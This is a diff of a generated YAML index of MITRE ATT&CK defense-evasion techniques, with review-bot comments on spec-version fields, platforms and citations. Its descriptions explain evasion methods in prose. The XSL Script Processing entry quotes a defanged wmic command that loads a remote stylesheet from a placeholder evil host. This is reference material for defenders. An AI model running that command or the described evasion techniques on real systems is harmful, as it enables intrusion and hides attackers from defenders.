Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
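Review bot: T1221 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place, so the object ends up with no ATT&CK spec version at all, whereas T1070.004 above is moved to `x_mitre_attack_spec_version: 3.2.0`; T1564.005, T1055.005 and T1055.008 below are handled the same way as T1221. Objects that predate the field in the source data will simply lack it, so either have the generator default it (for example to the bundle's own version) or document for consumers that the field is optional.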
@@ -12528,7 +12845,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12591,7 +12907,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12629,7 +12944,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12656,8 +12971,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12685,7 +12998,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12729,8 +13042,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12785,7 +13096,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12805,7 +13116,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -12855,7 +13165,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -12910,12 +13219,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -12965,12 +13273,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13030,8 +13337,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13048,37 +13355,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
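Review bot: the T1548.006 description switches from a double-quoted scalar to `description: |+`, and the `|+` chomping indicator keeps the trailing blank line after the last paragraph as part of the string value; every other description in this file uses `|-`, so confirm the dumper is choosing `|+` deterministically (most emitters do so when the source string ends in more than one newline) rather than this being hand-edited. The content change itself is upstream: the new text adds the MDM-provided file to the `tccd` lookup, states that TCC protections are off when SIP is disabled, and drops the closing sentence about injecting into already-permitted applications; 'an overwrites file' is upstream wording and should be left alone.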
@@ -13086,6 +13374,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13093,7 +13383,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13123,7 +13413,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13169,7 +13458,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -13214,8 +13503,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -13260,7 +13547,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13274,58 +13561,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
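Review bot: the one real content change in T1055.015's description, the new `(Citation: Hexacorn Listplanting)` after the first sentence, is buried under a rewrap of the whole string and the deletion of the object's header fields (`x_mitre_platforms`, `id`, `created`, `external_references`), which are reinserted further down; the matching `Hexacorn Listplanting` entry in `external_references` is added in a later hunk, so the citation key and the reference stay consistent. The `SysListView32` / `FindWindow` / `EnumWindows` fragments sitting on their own lines are present in both old and new and are an artifact of how the description was wrapped, not a regression.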
@@ -13342,6 +13599,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13356,21 +13616,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13415,9 +13706,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
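Review bot: T1484's `x_mitre_platforms` drops `Azure AD` and `SaaS` in favour of `Identity Provider` (with `x_mitre_version` going from 3.0 to 3.1); any per-platform index derived from this field by string match on 'Azure AD' or 'SaaS' will silently lose T1484, so the generator's platform-to-index mapping needs an 'Identity Provider' entry (or an explicit fold into the existing cloud or identity indexes), and that change belongs in this same regeneration.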
@@ -13474,8 +13764,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13484,57 +13774,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -13552,29 +13796,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
@@ -13607,7 +13895,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -13635,48 +13923,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
